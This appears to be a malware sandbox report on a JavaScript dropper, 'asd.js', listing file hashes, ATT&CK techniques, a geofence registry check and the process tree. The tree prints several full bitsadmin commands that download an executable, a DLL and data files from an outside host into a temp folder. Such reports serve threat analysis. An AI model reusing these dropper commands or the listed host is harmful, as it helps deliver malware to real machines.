d303a6fa94d9e755b2724e61940c9855550767fe2cbce850be0af9fb2745f59d

Analysis

max time kernel
142s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
22/11/2023, 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

asd.js
Size

9KB
MD5

422c42c5de0302f8297b4fb15e33f00d
SHA1

3e58421fef036bc38e6354b16db1616278a79cf9
SHA256

d303a6fa94d9e755b2724e61940c9855550767fe2cbce850be0af9fb2745f59d
SHA512

5623b64eb2cbc2457094348b23ae8b6c3c1edc97fac4d71b4793385620258549257dbc476f2e3eec60e5a5f3a244a45b619ab39b5ce0b43c8d5ec26c2dc48bba
SSDEEP

96:fFmCWEI5f7mxRgHw9Aqd8p8wrwzWk1fjnCafs:fFJWf9tHw9jW8wrXk1fjjfs

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 6 IoCs

dropper

BITS Jobs

T1197

pid	Process
2432	bitsadmin.exe
1616	bitsadmin.exe
3908	bitsadmin.exe
5012	bitsadmin.exe
4116	bitsadmin.exe
1072	bitsadmin.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 4480	4936	wscript.exe	83
PID 4936 wrote to memory of 4480	4936	wscript.exe	83
PID 4936 wrote to memory of 2796	4936	wscript.exe	85
PID 4936 wrote to memory of 2796	4936	wscript.exe	85
PID 4936 wrote to memory of 2432	4936	wscript.exe	93
PID 4936 wrote to memory of 2432	4936	wscript.exe	93
PID 4936 wrote to memory of 1616	4936	wscript.exe	97
PID 4936 wrote to memory of 1616	4936	wscript.exe	97
PID 4936 wrote to memory of 3908	4936	wscript.exe	101
PID 4936 wrote to memory of 3908	4936	wscript.exe	101
PID 4936 wrote to memory of 5012	4936	wscript.exe	103
PID 4936 wrote to memory of 5012	4936	wscript.exe	103
PID 4936 wrote to memory of 4116	4936	wscript.exe	108
PID 4936 wrote to memory of 4116	4936	wscript.exe	108
PID 4936 wrote to memory of 1072	4936	wscript.exe	110
PID 4936 wrote to memory of 1072	4936	wscript.exe	110
PID 4936 wrote to memory of 4244	4936	wscript.exe	112
PID 4936 wrote to memory of 4244	4936	wscript.exe	112
PID 4936 wrote to memory of 4572	4936	wscript.exe	114
PID 4936 wrote to memory of 4572	4936	wscript.exe	114

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\asd.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V /C "echo C:\TempData71862490209\>C:\Users\Public\Libraries\ex"&& exit
  2⤵
  PID:4480
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /reset
  2⤵
  PID:2796
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 67022686122 /priority foreground http://tpoi5i.cargadorepteis.sa.com/?47393640830628749 "C:\TempData71862490209\Kingston.QNAP.06636.6530.247.exe"
  2⤵
  - Download via BitsAdmin
  PID:2432
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 67022686122 /priority foreground http://tpoi5i.cargadorepteis.sa.com/?47362602242632968 "C:\TempData71862490209\Kingston.QNAP.06636.6530.247.log"
  2⤵
  - Download via BitsAdmin
  PID:1616
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 67022686122 /priority foreground http://tpoi5i.cargadorepteis.sa.com/?34297230365639081 "C:\TempData71862490209\Kingston.QNAP.06636.6530.247dbl.log"
  2⤵
  - Download via BitsAdmin
  PID:3908
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 67022686122 /priority foreground http://tpoi5i.cargadorepteis.sa.com/?61043668849678084 "C:\TempData71862490209\sqlite3.dll"
  2⤵
  - Download via BitsAdmin
  PID:5012
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 67022686122 /priority foreground http://tpoi5i.cargadorepteis.sa.com/?50998200058693680 "C:\TempData71862490209\sdk.log"
  2⤵
  - Download via BitsAdmin
  PID:4116
- C:\Windows\System32\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 67022686122 /priority foreground http://tpoi5i.cargadorepteis.sa.com/?53154035552613947 "C:\TempData71862490209\dump.log"
  2⤵
  - Download via BitsAdmin
  PID:1072
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V /C "echo Kingston.QNAP.06636.6530.247>C:\TempData71862490209\\r2.log"&& exit
  2⤵
  PID:4244
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V /C "echo Kingston.QNAP.06636.6530.247>C:\TempData71862490209\\r.log"&& exit
  2⤵
  PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads